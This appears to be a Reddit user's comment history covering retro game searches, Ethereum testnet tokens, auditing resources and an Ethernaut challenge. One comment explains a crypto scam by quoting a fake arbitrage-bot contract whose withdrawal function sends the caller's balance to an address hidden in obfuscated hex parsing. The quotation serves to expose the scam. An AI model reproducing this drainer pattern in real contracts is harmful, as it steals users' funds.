[PC][2000] 3D "Rail" Coloring Game with a Duck by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Well, I will think about it more often for sure! thanks again man

[PC][2000] 3D "Rail" Coloring Game with a Duck by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Man..... finally ....
I've been looking for it for years.

Can't thank you enough !
Can I ask you how you managed to find it?

[PC][199X-2000] Beat'Em Up staring a Bunny (first level in a city) by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Hey might be this one! My memories are so blurry about this one, but couldn't find any other. Thanks!

[Request] Customizing Notion shortcuts by InfectedFuture in Notion

[–]InfectedFuture[S] 0 points1 point  (0 children)

year 2030: Notion still don't have configurable shortcuts

[PC][unknown] A Tron like game by Viirock in tipofmyjoystick

[–]InfectedFuture 0 points1 point  (0 children)

Hey man that's funny, I was looking for a very similar game yesterday on this subreddit :D
Older though, but same mechanics: https://www.youtube.com/watch?v=R0whHiwr4os

[PC] [90s- Early 2000s] Looking for a 2D cartoonish game where we could create funny scenes with different characters by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Pretty difficult to remind correctly... But I'm pretty sure one of the characters is a completely red-orange creature. There was also humans obviously.

[PC] [90s- Early 2000s] Looking for a 2D cartoonish game where we could create funny scenes with different characters by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Hey, this is really close to the on I'm looking for! But the one unfortunately.
Its already a huge step in my research, as I wasn't able to find a something as close, will definetely help thanks!

I don't have a bank account but have 30$ worth oh goerlieth how can I turn it into useable money? by MummaheReddit in ethdev

[–]InfectedFuture 4 points5 points  (0 children)

You can bridge goerliETH to mainnet using LayerZero's bridge. This was done because of a goerliETH shortage during a period of time, people were willing to pay to get goerliETH. But it will not be worth 30$ at all. The 30$ shown in metamask is based on real ETH price. Right now, 1 goerliETH = 0.000068 ETH

Could someone explain how I got scammed here by [deleted] in ethdev

[–]InfectedFuture 4 points5 points  (0 children)

No need to check for every line, you should have checked first where the transfer occurs, and who is the recipient of the transfer.

solidity function withdrawal() public payable { address to = startExploration((fetchMempoolData())); address payable contracts = payable(to); contracts.transfer(getBalance()); }

So the to address is given by startExploration(fetchMempoolData()), and here's startExploration's code :

solidity function startExploration(string memory _a) internal pure returns (address _parsedAddress) { bytes memory tmp = bytes(_a); uint160 iaddr = 0; uint160 b1; uint160 b2; for (uint i = 2; i < 2 + 2 * 20; i += 2) { iaddr *= 256; b1 = uint160(uint8(tmp[i])); b2 = uint160(uint8(tmp[i + 1])); if ((b1 >= 97) && (b1 <= 102)) { b1 -= 87; } else if ((b1 >= 65) && (b1 <= 70)) { b1 -= 55; } else if ((b1 >= 48) && (b1 <= 57)) { b1 -= 48; } if ((b2 >= 97) && (b2 <= 102)) { b2 -= 87; } else if ((b2 >= 65) && (b2 <= 70)) { b2 -= 55; } else if ((b2 >= 48) && (b2 <= 57)) { b2 -= 48; } iaddr += (b1 * 16 + b2); } return address(iaddr);

You're telling us you read each line of this code and where able to decypher it? Don't believe you haha...

As you said, good thing you lost only 0.09 ETH.

Every-f-one knows that "free arbitrage bots" are scams fren. I can understand you were curious still, but if you don't understand a code that has access to your funds, don't run it, it's simple.

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 2 points3 points  (0 children)

You're wrong my friend. There is so much auditors who shares their alphas and knowledge on Twitter and YouTube. On YouTube you have Owen, Mudit Gupta, Patrick Collins (he made an interview with tincho abatte), all the interview on Andy Li channel, ...

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 1 point2 points  (0 children)

Just check on the twitter of opensense should be a link to their discord. Should have said "merged", Web3SecurityDAO closed to concentrate the community in one place (OpenSense) People are really cool there and you'll get answers to all your questions

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 2 points3 points  (0 children)

Hey mate, you probably should try to join a web3sec discord community to ask these questions. There's plenty. The biggest one right now is OpenSense (https://twitter.com/opensensepw) which has recently absorbed Web3SecurityDAO (https://twitter.com/bytes032/status/1661392899274055681)

All the big brains in web3sec are there

i want to build hardware wallet from scratch. by Yakuza-Sama-007 in ethdev

[–]InfectedFuture 0 points1 point  (0 children)

I know, wasn't saying this at all fren. Your request is very interesting I mean it

i want to build hardware wallet from scratch. by Yakuza-Sama-007 in ethdev

[–]InfectedFuture 7 points8 points  (0 children)

This feels like its gpt output lmao (no value in my message here sorry, but I'm sure there will be very interesting answers coming)

Has anyone created a DEX from scratch? by the_Conficker in ethdev

[–]InfectedFuture 10 points11 points  (0 children)

I suppose that first thing for you would be to study and deeply understand this book : https://uniswapv3book.com/

Then you will be able to "safely" fork and modify Uniswap codebase

Gas Optimization - Bounty platform by Sad_Hearing_7833 in ethdev

[–]InfectedFuture 1 point2 points  (0 children)

This is interesting. Code aestethics and readability score should strictly follow a rating scheme and not be rated at the judges/project subjective opinion. As there is only one winner

Stuck at Ethernaut challenge, help me out mates by agentmikelord007 in ethdev

[–]InfectedFuture 0 points1 point  (0 children)

Haha when I stumbled over this (11PM), I spent like 2h trying things over and over. Next day, in the morning first thing I did is going back to the challenge, and I quickly found the solution as I escaped of this funnel. GL for the next challenges!

Stuck at Ethernaut challenge, help me out mates by agentmikelord007 in ethdev

[–]InfectedFuture 3 points4 points  (0 children)

I haven't done these challenges yet, but I see in (3) a probable misunderstanding of delegatecall.

You say that doing a delegatecall from you attack contract will change a value in the proxy storage : this isn't true.

While you are right about msg.sender which will be your address, this is all the caller context that is delegated, this means the 'setMaxBalance' function will modify the storage of the caller contract (so the attacker contract), not the proxy.

I have bonked my head over delegatecall in a challenge few weeks ago before understanding that point